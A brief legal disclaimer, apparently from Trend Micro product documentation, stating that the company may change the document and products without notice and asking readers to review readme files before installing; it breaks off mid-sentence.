Trend Micro Incorporated reserves the right to make changes to this document and to the products described herein without notice. Before installing and using the software, please review the readme files,

More information